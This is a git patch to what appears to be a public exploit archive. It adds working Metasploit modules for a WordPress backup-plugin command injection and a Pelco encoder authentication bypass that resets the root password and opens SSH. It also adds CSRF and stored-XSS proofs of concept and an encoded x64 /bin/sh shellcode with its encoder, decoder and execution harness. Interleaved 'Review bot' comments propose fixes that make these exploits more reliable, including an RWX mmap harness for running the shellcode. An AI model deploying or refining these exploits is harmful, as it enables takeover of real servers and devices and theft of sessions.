From 852694f9827cd3e573158a36d6431b68a2c38a9c Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Tue, 30 Jul 2019 05:02:12 +0000 Subject: [PATCH] DB: 2019-07-30 6 changes to exploits/shellcodes Schneider Electric Pelco Endura NET55XX Encoder - Authentication Bypass (Metasploit) WP Database Backup < 5.2 - Remote Code Execution (Metasploit) WordPress Plugin Simple Membership 3.8.4 - Cross-Site Request Forgery WordPress Theme Real Estate 2.8.9 - Cross-Site Scripting GigToDo 1.3 - Cross-Site Scripting Linux/x86 - NOT +SHIFT-N+ XOR-N Encoded /bin/sh Shellcode --- exploits/php/remote/47187.rb | 194 ++++++++++++++++++++++++++++++++ exploits/php/webapps/47182.html | 24 ++++ exploits/php/webapps/47184.txt | 33 ++++++ exploits/php/webapps/47185.txt | 39 +++++++ exploits/unix/remote/47186.rb | 160 ++++++++++++++++++++++++++ files_exploits.csv | 5 + files_shellcodes.csv | 1 + shellcodes/linux_x86-64/47183.c | 167 +++++++++++++++++++++++++++ 8 files changed, 623 insertions(+) create mode 100755 exploits/php/remote/47187.rb create mode 100644 exploits/php/webapps/47182.html create mode 100644 exploits/php/webapps/47184.txt create mode 100644 exploits/php/webapps/47185.txt create mode 100755 exploits/unix/remote/47186.rb create mode 100644 shellcodes/linux_x86-64/47183.c diff --git a/exploits/php/remote/47187.rb b/exploits/php/remote/47187.rb new file mode 100755 index 000000000..5356b4ab3 --- /dev/null +++ b/exploits/php/remote/47187.rb 
@@ -0,0 +1,194 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::CmdStager + include Msf::Exploit::Powershell + include Msf::Exploit::Remote::HTTP::Wordpress + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'WP Database Backup RCE', + 'Description' => %q( + There exists a command injection vulnerability in the Wordpress plugin + `wp-database-backup` for versions < 5.2. + + For the backup functionality, the plugin generates a `mysqldump` command + to execute. The user can choose specific tables to exclude from the backup + by setting the `wp_db_exclude_table` parameter in a POST request to the + `wp-database-backup` page. The names of the excluded tables are included in + the `mysqldump` command unsanitized. Arbitrary commands injected through the + `wp_db_exclude_table` parameter are executed each time the functionality + for creating a new database backup are run. + + Authentication is required to successfully exploit this vulnerability. 
+ ), + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Mikey Veenstra / Wordfence', # Vulnerability Discovery + 'Shelby Pace' # Metasploit module + ], + 'References' => + [ + [ 'URL', 'https://www.wordfence.com/blog/2019/05/os-command-injection-vulnerability-patched-in-wp-database-backup-plugin/' ], + ], + 'Platform' => [ 'win', 'linux' ], + 'Arch' => [ ARCH_X86, ARCH_X64 ], + 'Targets' => + [ + [ + 'Windows', + { + 'Platform' => 'win', + 'Arch' => [ ARCH_X86, ARCH_X64 ] + } + ], + [ + 'Linux', + { + 'Platform' => 'linux', + 'Arch' => [ ARCH_X86, ARCH_X64 ], + 'CmdStagerFlavor' => 'printf' + } + ] + ], + 'DisclosureDate' => '2019-04-24', + 'DefaultTarget' => 0 + )) + + register_options( + [ + OptString.new('USERNAME', [ true, 'Wordpress username', '' ]), + OptString.new('PASSWORD', [ true, 'Wordpress password', '' ]), + OptString.new('TARGETURI', [ true, 'Base path to Wordpress installation', '/' ]) + ]) + end + + def check + return CheckCode::Unknown unless wordpress_and_online? + + changelog_uri = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wp-database-backup', 'readme.txt') + res = send_request_cgi( + 'method' => 'GET', + 'uri' => changelog_uri + ) + + if res && res.code == 200 + version = res.body.match(/=+\s(\d+\.\d+)\.?\d*\s=/) + return CheckCode::Detected unless version && version.length > 1 + + vprint_status("Version of wp-database-backup detected: #{version[1]}") + return CheckCode::Appears if Gem::Version.new(version[1]) < Gem::Version.new('5.2') + end + CheckCode::Safe + end + + def exploit + cookie = wordpress_login(datastore['USERNAME'], datastore['PASSWORD']) + fail_with(Failure::NoAccess, 'Unable to log into Wordpress') unless cookie + + res = create_exclude_table(cookie) + nonce = get_nonce(res) + create_backup(cookie, nonce) + + clear_exclude_table(cookie) + end + + def create_exclude_table(cookie) + @exclude_uri = normalize_uri(target_uri.path, 'wp-admin', 'tools.php') + res = send_request_cgi( + 'method' => 'GET', + 'uri' => 
@exclude_uri, + 'cookie' => cookie, + 'vars_get' => { 'page' => 'wp-database-backup' } + ) + + fail_with(Failure::NotFound, 'Unable to reach the wp-database-backup settings page') unless res && res.code == 200 + print_good('Reached the wp-database-backup settings page') + if datastore['TARGET'] == 1 + comm_payload = generate_cmdstager(concat_operator: ' && ', temp: './') + comm_payload = comm_payload.join('&&') + comm_payload = comm_payload.gsub('\'', '') + comm_payload = "; #{comm_payload} ;" + else + comm_payload = " & #{cmd_psh_payload(payload.encoded, payload.arch, remove_comspec: true, encode_final_payload: true)} & ::" + end + + table_res = send_request_cgi( + 'method' => 'POST', + 'uri' => @exclude_uri, + 'cookie' => cookie, + 'vars_post' => + { + 'wpsetting' => 'Save', + 'wp_db_exclude_table[wp_comment]' => comm_payload + } + ) + + fail_with(Failure::UnexpectedReply, 'Failed to submit payload as an excluded table') unless table_res && table_res.code + print_good('Successfully added payload as an excluded table') + + res.get_html_document + end + + def get_nonce(response) + fail_with(Failure::UnexpectedReply, 'Failed to get a proper response') unless response + + div_res = response.at('p[@class="submit"]') + fail_with(Failure::NotFound, 'Failed to find the element containing the nonce') unless div_res + + wpnonce = div_res.to_s.match(/_wpnonce=([0-9a-z]*)/) + fail_with(Failure::NotFound, 'Failed to retrieve the wpnonce') unless wpnonce && wpnonce.length > 1 + + wpnonce[1] + end + + def create_backup(cookie, nonce) + first_res = send_request_cgi( + 'method' => 'GET', + 'uri' => @exclude_uri, + 'cookie' => cookie, + 'vars_get' => + { + 'page' => 'wp-database-backup', + '_wpnonce' => nonce, + 'action' => 'createdbbackup' + } + ) + + res = send_request_cgi( + 'method' => 'GET', + 'uri' => @exclude_uri, + 'cookie' => cookie, + 'vars_get' => + { + 'page' => 'wp-database-backup', + 'notification' => 'create' + } + ) + + fail_with(Failure::UnexpectedReply, 'Failed 
to create database backup') unless res && res.code == 200 && res.body.include?('Database Backup Created Successfully') + print_good('Successfully created a backup of the database') + end + + def clear_exclude_table(cookie) + res = send_request_cgi( + 'method' => 'POST', + 'uri' => @exclude_uri, + 'cookie' => cookie, + 'vars_post' => + { + 'wpsetting' => 'Save', + 'wp_db_exclude_table[wp_comment]' => 'wp_comment' + } + ) + + fail_with(Failure::UnexpectedReply, 'Failed to delete the remove the payload from the excluded tables') unless res && res.code == 200 + print_good('Successfully deleted the payload from the excluded tables list') + end +end \ No newline at end of file diff --git a/exploits/php/webapps/47182.html b/exploits/php/webapps/47182.html new file mode 100644 index 000000000..0127ca4ca --- /dev/null +++ b/exploits/php/webapps/47182.html @@ -0,0 +1,24 @@ +# Exploit Title: Cross Site Request Forgery in Wordpress Simple Membership plugin +# Date: 2019-07-27 +# Exploit Author: rubyman +# Vendor Homepage: https://wordpress.org/plugins/simple-membership/ +# wpvulndb : https://wpvulndb.com/vulnerabilities/9482 +# Version: 3.8.4 +# Tested on: Windows 8.1 +# CVE : CVE-2019-14328 + +# +# Change localhost to your desired host +# + + + + +
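Review bot: The guard after the POST in `create_exclude_table`, `unless table_res && table_res.code`, accepts any HTTP status, so a login redirect or a 403 from a WAF still prints "Successfully added payload" and the module goes on to trigger a backup that will never run the command; `clear_exclude_table` already checks `res.code == 200`, and this guard should read `unless table_res && table_res.code == 200`. The branch selector `datastore['TARGET'] == 1` tests the raw option value rather than the resolved target; `target['Platform'] == 'linux'` is the conventional form and still works when TARGET is given by name. Cleanup is also lossy: it overwrites the excluded-table setting with `wp_comment` instead of restoring whatever was configured, so the target's backup configuration stays altered after the session is up; the settings-page response already fetched in `create_exclude_table` could presumably be parsed for the existing `wp_db_exclude_table[]` values and replayed in `clear_exclude_table`.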
+ + + + +
+ + \ No newline at end of file diff --git a/exploits/php/webapps/47184.txt b/exploits/php/webapps/47184.txt new file mode 100644 index 000000000..bc5b6670d --- /dev/null +++ b/exploits/php/webapps/47184.txt @@ -0,0 +1,33 @@ +# Exploit Title: Real Estate 7 - Real Estate WordPress Theme v2.8.9 +Persistent XSS Injection +# Google Dork: inurl:"/wp-content/themes/realestate-7/" +# Date: 2019/07/20 +# Author: m0ze +# Vendor Homepage: https://contempothemes.com +# Software Link: https://themeforest.net/item/wp-pro-real-estate-7-responsive-real-estate-wordpress-theme/12473778 +# Version: <= 2.8.9 +# Tested on: NginX +# CVE: - +# CWE: CWE-79 + +Details & Description: +The «Real Estate 7» premium WordPress theme is vulnerable to persistent XSS +injection that allows an attacker to inject JavaScript or HTML code into +the website front-end. + +Special Note: +- 7.151 Sales +- If pre moderation is enabled, then u have a huge chance to steal an admin +or moderator cookies. +- U can edit any existed listing on the website by changing the unique ID +-> https://site.com/edit-listing/?listings=XXX (where XXX is WordPress post +ID, u can find it inside tag class). + +PoC [Persistent XSS Injection]: +First of all, register a new account as a seller or agent, log in and +choose free membership package @ the dashboard. After that u'll be able to +submit a new listing -> https://site.com/submit-listing/ +For persistent XSS injection u need to add ur payload inside the «Vitrual +Tour Embed» text area (on the «DETAILS» step) and then press «Submit» +button. +Example: \ No newline at end of file diff --git a/exploits/php/webapps/47185.txt b/exploits/php/webapps/47185.txt new file mode 100644 index 000000000..1fbc46967 --- /dev/null +++ b/exploits/php/webapps/47185.txt 
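Review bot: The "Special Note" section reports that any listing can be edited by changing the post ID in `/edit-listing/?listings=XXX`, which is a missing-authorization bug (CWE-639/CWE-862) separate from the stored XSS the header classifies as CWE-79, yet it has no reproduction steps and is not reflected in the title or CWE field. It should either be written up as its own finding with a PoC (two accounts, one editing the other's listing) or dropped from this advisory. The field name is also misspelled — `«Vitrual Tour Embed»` should read `«Virtual Tour Embed»` — which matters because testers locate the field by its label.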
@@ -0,0 +1,39 @@ +# Exploit Title: GigToDo - Freelance Marketplace Script v1.3 Persistent XSS Injection +# Google Dork: - +# Date: 2019/07/28 +# Author: m0ze +# Vendor Homepage: https://www.gigtodoscript.com +# Software Link: https://codecanyon.net/item/gigtodo-freelance-marketplace-script/23855397 +# Version: <= 1.3 +# Tested on: NginX/1.15.10 +# CVE: - +# CWE: CWE-79 + + +Details & Description: +The «GigToDo - Freelance Marketplace Script» web-application is vulnerable +to reflected and persistent XSS injections that allows an attacker to +inject JavaScript/HTML code into the front-end, redirect visitor to another +website or steal admin cookies. + + +PoC [Persistent XSS Injection]: +Register a new account, log in and go to the +https://www.site.com/proposals/create_proposal page. Vulnerable text area +is «Proposal's Description», so paste your payload inside, fill in other +fields and save the data TWICE or your payload WILL NOT WORK. So literally +paste your payload inside the «Proposal's Description» text area and scroll +down to «Update Proposal» button, press it and your data will be saved. +After that u'll be redirected to +https://www.site.com/proposals/view_proposals.php page. Select your created +proposal and press green square dropdown menu on the right («Actions» +column) and click on «Edit» link. After that just don't change anything, +scroll down to «Update Proposal» button, press it and your data will be +saved ONE MORE TIME. That's it, now your payload will work. +Example #1:

m0ze

1"--> +Example #2:

m0ze

1"--> \ No newline at end of file diff --git a/exploits/unix/remote/47186.rb b/exploits/unix/remote/47186.rb new file mode 100755 index 000000000..2a7d817ca --- /dev/null +++ b/exploits/unix/remote/47186.rb 
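Review bot: The description claims both reflected and persistent XSS, but the PoC covers only the persistent vector in «Proposal's Description»; the reflected endpoint and parameter are never named, so that claim is unverifiable as written. Add a `PoC [Reflected XSS Injection]:` section naming the page, the parameter and a sample URL, or limit the description to the stored issue. The double-save requirement also deserves one sentence on the cause — presumably the create path encodes or filters the field while the edit path stores it raw — since that is what a maintainer needs to locate the fix.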
@@ -0,0 +1,160 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::Udp + include Msf::Exploit::Remote::HttpClient + include Msf::Auxiliary::Report + include Msf::Exploit::Remote::SSH + + def initialize(info={}) + super(update_info(info, + 'Name' => "Schneider Electric Pelco Endura NET55XX Encoder", + 'Description' => %q( + This module exploits inadequate access controls within the webUI to enable + the SSH service and change the root password. This module has been tested successfully + on: NET5501, NET5501-I, NET5501-XT, NET5504, NET5500, NET5516, NET550 versions. + ), + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Lucas Dinucci ', + 'Vitor Esperança ' + ], + 'References' => + [ + ['CVE', '2019-6814'], + ['URL', 'https://www.schneider-electric.com/en/download/document/SEVD-2019-134-01/'] + ], + 'Payload' => + { + 'Compat' => { + 'PayloadType' => 'cmd_interact', + 'ConnectionType' => 'find' + } + }, + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Targets' => [ [ "Universal", {} ] ], + 'Privileged' => true, + 'DisclosureDate' => "Jan 25 2019", + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('NEW_PASSWORD', [ true, 'New password to be set for the root account', Rex::Text.rand_text_alphanumeric(16)]), + OptInt.new('TIMEOUT', [ true, 'Timeout for the requests', 10]) + ] + ) + + register_advanced_options( + [ + OptInt.new('UDP_PORT', [ true, 'UDP port for the ONVIF service', 3702]), + OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]), + OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30]) + ] + ) + end + + def new_password + datastore['NEW_PASSWORD'] + end + + def check + xmlPayload = ''\ + ''\ + '
'\ + 'http://schemas.xmlsoap.org/ws/2005/04/discovery/Probe'\ + 'uuid:f3d577a3-431f-4450-ab45-b480042b9c74'\ + ''\ + 'http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous'\ + ''\ + 'urn:schemas-xmlsoap-org:ws:2005:04:discovery'\ + '
'\ + '
'\ + ''\ + 'dp0:NetworkVideoTransmitter'\ + ''\ + ''\ + '' + + connect_udp(true, {'RPORT' => datastore['UDP_PORT']}) + udp_sock.put(xmlPayload) + resp = [] + resp << udp_sock.get(datastore['TIMEOUT']) + xmlResponse = resp.join(',') + disconnect_udp + if xmlResponse.include?("NET5501") || xmlResponse.include?("NET5501-I") || xmlResponse.include?("NET5501-XT") || xmlResponse.include?("NET5504") || xmlResponse.include?("NET5500") || xmlResponse.include?("NET5516") || xmlResponse.include?("NET5508") + return Exploit::CheckCode::Appears + end + CheckCode::Safe + end + + def change_password + print_status("#{peer} - Attempt to change the root password...") + post = {"enable": true, "passwd": new_password, "userid": "root"}.to_json + + login = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, '/cgi-bin/webra.fcgi?network/ssh'), + 'data' => post, + 'headers' => + { + 'Cookie' => 'live_onoff=0; userid=admin; grpid=ADMIN; permission=2147483647', + 'Content-Type' => 'application/json;charset=utf-8' + } + }, timeout=datastore['TIMEOUT']) + + fail_with(Failure::UnexpectedReply, "Failed to change root password") unless login && login.code == 200 + print_good("#{rhost}:80 - Successfully changed the root password...") + print_good("#{rhost}:80 - New credentials: User: root / Password: #{new_password}") + end + + def do_login + change_password + print_status("#{rhost}:22 - Attempt to start a SSH connection...") + factory = ssh_socket_factory + opts = { + :auth_methods => ['password', 'keyboard-interactive'], + :port => 22, + :use_agent => false, + :config => true, + :password => new_password, + :proxy => factory, + :non_interactive => true, + :verify_host_key => :never + } + opts.merge!(:verbose => :debug) if datastore['SSH_DEBUG'] + begin + ssh = nil + ::Timeout.timeout(datastore['SSH_TIMEOUT']) do + ssh = Net::SSH.start(datastore['RHOST'], 'root', opts) + end + rescue Rex::ConnectionError + rescue Net::SSH::Disconnect, ::EOFError + print_error 
"#{rhost}:22 SSH - Disconnected during negotiation" + rescue ::Timeout::Error + print_error "#{rhost}:22 SSH - Timed out during negotiation" + rescue Net::SSH::AuthenticationFailed + print_error "#{rhost}:22 SSH - Failed authentication" + rescue Net::SSH::Exception => e + print_error "#{rhost}:22 SSH Error: #{e.class} : #{e.message}" + end + if ssh + conn = Net::SSH::CommandStream.new(ssh) + return conn + end + end + + def exploit + conn = do_login + if conn + print_good("#{rhost}:22 - Session established ") + handler(conn.lsock) + end + end +end \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index c893983f3..34d3fec5e 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -17582,6 +17582,8 @@ id,file,description,date,author,type,platform,port 47130,exploits/windows/remote/47130.txt,"MAPLE Computer WBT SNMP Administrator 2.0.195.15 - Remote Buffer Overflow",2019-07-17,hyp3rlinx,remote,windows, 47137,exploits/windows_x86/remote/47137.py,"MAPLE Computer WBT SNMP Administrator 2.0.195.15 - Remote Buffer Overflow (EggHunter)",2019-07-19,sasaga92,remote,windows_x86, 47155,exploits/multiple/remote/47155.txt,"Trend Micro Deep Discovery Inspector IDS - Security Bypass",2019-07-24,hyp3rlinx,remote,multiple, +47186,exploits/unix/remote/47186.rb,"Schneider Electric Pelco Endura NET55XX Encoder - Authentication Bypass (Metasploit)",2019-07-29,Metasploit,remote,unix, +47187,exploits/php/remote/47187.rb,"WP Database Backup < 5.2 - Remote Code Execution (Metasploit)",2019-07-29,Metasploit,remote,php,80 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php, 
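Review bot: The `rescue Rex::ConnectionError` in `do_login` has an empty body, so a refused or reset SSH connection ends the run with no message at all — after `change_password` has already replaced the device's root password, which the module cannot undo. Give it a `print_error "#{rhost}:22 SSH - Connection failed"` like its sibling rescues, and emit a `print_warning` before the POST stating that the root credential is overwritten and persists after the session closes. The bypass itself is the forged `Cookie: userid=admin; grpid=ADMIN; permission=2147483647` header and deserves a comment saying so, since nothing else in the module explains why an unauthenticated POST is honoured. The SSH port is fixed at `:port => 22` and the success lines hard-code `:80`, which diverge from `RPORT` when the web UI sits elsewhere; printing `#{peer}` and registering an `SSH_PORT` option would keep output and connection consistent. The `check` list also matches NET5508 while the description says NET550, which looks like a typo on one side.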
@@ -41555,3 +41557,6 @@ id,file,description,date,author,type,platform,port
 47179,exploits/jsp/webapps/47179.py,"Ahsay Backup 7.x - 8.1.1.50 - Authenticated Arbitrary File Upload / Remote Code Execution",2019-07-26,"Wietse Boonstra",webapps,jsp,
 47180,exploits/jsp/webapps/47180.rb,"Ahsay Backup 7.x - 8.1.1.50 - Authenticated Arbitrary File Upload / Remote Code Execution (Metasploit)",2019-07-26,"Wietse Boonstra",webapps,jsp,443
 47181,exploits/jsp/webapps/47181.txt,"Ahsay Backup 7.x - 8.1.1.50 - XML External Entity Injection",2019-07-26,"Wietse Boonstra",webapps,jsp,80
+47182,exploits/php/webapps/47182.html,"WordPress Plugin Simple Membership 3.8.4 - Cross-Site Request Forgery",2019-07-29,rubyman,webapps,php,80
+47184,exploits/php/webapps/47184.txt,"WordPress Theme Real Estate 2.8.9 - Cross-Site Scripting",2019-07-29,m0ze,webapps,php,80
+47185,exploits/php/webapps/47185.txt,"GigToDo 1.3 - Cross-Site Scripting",2019-07-29,m0ze,webapps,php,80
diff --git a/files_shellcodes.csv b/files_shellcodes.csv
index 0c7cfaa3a..b91c0e8ad 100644
--- a/files_shellcodes.csv
+++ b/files_shellcodes.csv
@@ -989,3 +989,4 @@ id,file,description,date,author,type,platform
 47068,shellcodes/linux_x86/47068.c,"Linux/x86 - execve(/bin/sh) using JMP-CALL-POP Shellcode (21 bytes)",2019-07-01,"Kirill Nikolaev",shellcode,linux_x86
 47108,shellcodes/linux_x86/47108.txt,"Linux/x86 - chmod 666 /etc/passwd & chmod 666 /etc/shadow Shellcode (61 bytes)",2019-07-12,"Xavier Invers Fornells",shellcode,linux_x86
 47151,shellcodes/linux_x86-64/47151.c,"Linux/x86_64 - Wget Linux Enumeration Script Shellcode (155 Bytes)",2019-07-23,"Kağan Çapar",shellcode,linux_x86-64
+47183,shellcodes/linux_x86-64/47183.c,"Linux/x86 - NOT +SHIFT-N+ XOR-N Encoded /bin/sh Shellcode",2019-07-29,"Pedro Cabral",shellcode,linux_x86-64
diff --git a/shellcodes/linux_x86-64/47183.c b/shellcodes/linux_x86-64/47183.c
new file mode 100644
index 000000000..58dc7dafe
--- /dev/null
+++ b/shellcodes/linux_x86-64/47183.c
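Review bot: The new `files_shellcodes.csv` row titles the entry `Linux/x86 - NOT +SHIFT-N+ XOR-N Encoded /bin/sh Shellcode` while its path and platform column are `linux_x86-64` and the listing itself is x64 NASM (`rax`, `syscall`); the title should read `Linux/x86_64 - …` as the neighbouring 47151 row does. For consistency with the other rows the size `(168 bytes)` stated in the listing header should also be appended to the title.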
@@ -0,0 +1,167 @@ +/* +######################################## description ######################################## + +; Title : X64 [NOT +SHIFT-N+ XOR-N] encoded /bin/sh - shellcode +; Author : Pedro Cabral +; Twitter : @CabrallPedro +; LinkedIn : https://www.linkedin.com/in/pedro-cabral1992 +; SLAE ID : SLAE64 - 1603 +; Purpose : spawn /bin/sh shell +; Tested On : Ubuntu 16.04.6 LTS +; Arch : x64 +; Size : 168 bytes + +########################################## sh.asm ########################################### + +global _start + +section .text + +_start: + xor rax, rax + push rax ; push null + mov rbx, 0x68732f2f6e69622f ;/bin//sh in reverse + push rbx ; push to the stack + mov rdi, rsp ; store the /bin//sh on rdi + push rax ; push null + mov rdx, rsp ; set rdx + push rdi ; push the address of /bin//sh + mov rsi, rsp ; set rsi + add rax, 59 ; rax = 59 (execve) + syscall + + +#################################### original shellcode ##################################### + +pedro@ubuntu>nasm -felf64 sh.asm -o sh.o +pedro@ubuntu>ld -N -o sh sh.o +pedro@ubuntu>echo;objdump -d ./sh.o|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g';echo + +"\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\x50\x48\x89\xe2\x57\x48\x89\xe6\x48\x83\xc0\x3b\x0f\x05" + + +######################################## encode.py ######################################## + +#!/usr/bin/python + +import sys + +if len(sys.argv) != 3: + print "Usage : python encode.py " + sys.exit(0) + +shift = int(sys.argv[1]) +xor = int(sys.argv[2]) + +shellcode = ("\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\x50\x48\x89\xe2\x57\x48\x89\xe6\x48\x83\xc0\x3b\x0f\x05") + + +# addition to the inicial of the shellcode the SHIFT and XOR values +encoded_shellcode ="" +encoded_shellcode += '0x01' #prevent null bytes on the shellcode +encoded_shellcode += '%02x, ' %shift 
+encoded_shellcode += '0x' +encoded_shellcode += '%02x, ' %xor + +# [NOT + SHL-N + XOR-N] encoded shellcode +for i in bytearray(shellcode): + new = ~i & 0xff + new = new << shift + new = new ^ xor + encoded_shellcode += '0x' + encoded_shellcode += '%02x, ' %new + +# end of shellcode +encoded_shellcode += '0x' +encoded_shellcode += '%02x, ' %xor +encoded_shellcode += '0x' +encoded_shellcode += '%02x' %xor + +# print encoded shellcode +print encoded_shellcode + +#################################### Encoded Shellcode ##################################### + +pedro@ubuntu>python encoder.py 4 1337 +0x0104, 0x539, 0xe49, 0x9d9, 0x6c9, 0xfc9, 0xe49, 0x179, 0x839, 0xce9, 0xc59, 0xc29, 0x839, 0x839, 0xdf9, 0xc49, 0xff9, 0xe49, 0x259, 0x4b9, 0xfc9, 0xe49, 0x259, 0x4e9, 0xfb9, 0xe49, 0x259, 0x4a9, 0xe49, 0x2f9, 0x6c9, 0x979, 0xa39, 0xa99, 0x539, 0x539 + +####################################### decoder.asm ######################################## + +global _start + +section .text + +_start: + + jmp decoder + encoded : dw 0x0104, 0x539, 0xe49, 0x9d9, 0x6c9, 0xfc9, 0xe49, 0x179, 0x839, 0xce9, 0xc59, 0xc29, 0x839, 0x839, 0xdf9, 0xc49, 0xff9, 0xe49, 0x259, 0x4b9, 0xfc9, 0xe49, 0x259, 0x4e9, 0xfb9, 0xe49, 0x259, 0x4a9, 0xe49, 0x2f9, 0x6c9, 0x979, 0xa39, 0xa99, 0x539, 0x539 + +decoder: + lea rsi, [rel encoded] + + xor rcx, rcx + xor r9,r9 + xor r10,r10 + + mov word cx, [rsi] + inc rsi + inc rsi + mov word r9w, [rsi] + inc rsi + inc rsi + push rsi + mov rdi, rsi +main: ; to deal with 0xff on the original shellcode + mov word r10w,[rsi] + xor r10w, r9w + jz second_check +main2: + shr r10, cl + not word r10w + mov byte [rdi], r10b + inc rsi + inc rsi + inc rdi + jmp short main + +second_check: + mov word r10w, [rsi+2] + xor r10w, r9w + jz call_encoded + mov word r10w, [rsi] + xor r10w, r9w + jmp main2 + +call_encoded: + call [rsp] + +###################################### final shellcode ###################################### + +pedro@ubuntu>nasm -felf64 decoder.asm -o decoder.o 
+pedro@ubuntu>echo;objdump -d ./decoder.o|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g';echo + +"\xeb\x48\x04\x01\x39\x05\x49\x0e\xd9\x09\xc9\x06\xc9\x0f\x49\x0e\x79\x01\x39\x08\xe9\x0c\x59\x0c\x29\x0c\x39\x08\x39\x08\xf9\x0d\x49\x0c\xf9\x0f\x49\x0e\x59\x02\xb9\x04\xc9\x0f\x49\x0e\x59\x02\xe9\x04\xb9\x0f\x49\x0e\x59\x02\xa9\x04\x49\x0e\xf9\x02\xc9\x06\x79\x09\x39\x0a\x99\x0a\x39\x05\x39\x05\x48\x8d\x35\xb1\xff\xff\xff\x48\x31\xc9\x4d\x31\xc9\x4d\x31\xd2\x66\x8b\x0e\x48\xff\xc6\x48\xff\xc6\x66\x44\x8b\x0e\x48\xff\xc6\x48\xff\xc6\x56\x48\x89\xf7\x66\x44\x8b\x16\x66\x45\x31\xca\x74\x15\x49\xd3\xea\x66\x41\xf7\xd2\x44\x88\x17\x48\xff\xc6\x48\xff\xc6\x48\xff\xc7\xeb\xe1\x66\x44\x8b\x56\x02\x66\x45\x31\xca\x74\x0a\x66\x44\x8b\x16\x66\x45\x31\xca\xeb\xd6\xff\x14\x24" + +pedro@ubuntu>gcc -fno-stack-protector -z execstack testShellcode.c -o testShellcode +pedro@ubuntu>./testShellcode +Shellcode Length: 168 +$ whoami +pedro +*/ + + +#include +#include + + +unsigned char code[] = \ +"\xeb\x48\x04\x01\x39\x05\x49\x0e\xd9\x09\xc9\x06\xc9\x0f\x49\x0e\x79\x01\x39\x08\xe9\x0c\x59\x0c\x29\x0c\x39\x08\x39\x08\xf9\x0d\x49\x0c\xf9\x0f\x49\x0e\x59\x02\xb9\x04\xc9\x0f\x49\x0e\x59\x02\xe9\x04\xb9\x0f\x49\x0e\x59\x02\xa9\x04\x49\x0e\xf9\x02\xc9\x06\x79\x09\x39\x0a\x99\x0a\x39\x05\x39\x05\x48\x8d\x35\xb1\xff\xff\xff\x48\x31\xc9\x4d\x31\xc9\x4d\x31\xd2\x66\x8b\x0e\x48\xff\xc6\x48\xff\xc6\x66\x44\x8b\x0e\x48\xff\xc6\x48\xff\xc6\x56\x48\x89\xf7\x66\x44\x8b\x16\x66\x45\x31\xca\x74\x15\x49\xd3\xea\x66\x41\xf7\xd2\x44\x88\x17\x48\xff\xc6\x48\xff\xc6\x48\xff\xc7\xeb\xe1\x66\x44\x8b\x56\x02\x66\x45\x31\xca\x74\x0a\x66\x44\x8b\x16\x66\x45\x31\xca\xeb\xd6\xff\x14\x24"; + +void main(){ + printf("Shellcode Length: %zu\n",strlen(code)); + + int (*ret)() = (int(*)())code; + + ret(); + +} \ No newline at end of file
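Review bot: The harness runs the shellcode straight out of the writable global `code[]` array, and the decoder loop at `main:` rewrites that same buffer in place (`mov byte [rdi], r10b` with `rdi` pointing at `encoded`), so the page must be readable, writable and executable at once. That works on the stated Ubuntu 16.04 box because `-z execstack` historically made the kernel map the whole process executable (READ_IMPLIES_EXEC), but the listing should say so, since on more recent x86-64 kernels that legacy behaviour is reportedly no longer applied and the indirect call will fault; a portable harness copies `code` into an `mmap` region with `PROT_READ|PROT_WRITE|PROT_EXEC` (needs `<sys/mman.h>`). Separately, `void main()` is not standard C and should be `int main(void)` with `return 0;`, and the terminator logic in `second_check` tolerates only one encoded word equal to the XOR key, so two consecutive original bytes that encode to the key would truncate the decode — the chosen parameters (shift 4, key 0x539) cannot produce that, which is worth a comment next to the `encoded:` line.
```c
/* … unchanged: encoded shellcode in code[] … */
int main(void) {
    size_t len = strlen((const char *)code);
    printf("Shellcode Length: %zu\n", len);
    /* RWX mapping: the decoder overwrites the buffer in place, then jumps into it */
    void *mem = mmap(NULL, len, PROT_READ | PROT_WRITE | PROT_EXEC,
                     MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (mem == MAP_FAILED) { perror("mmap"); return 1; }
    memcpy(mem, code, len);
    ((void (*)(void))mem)();
    return 0;
}
```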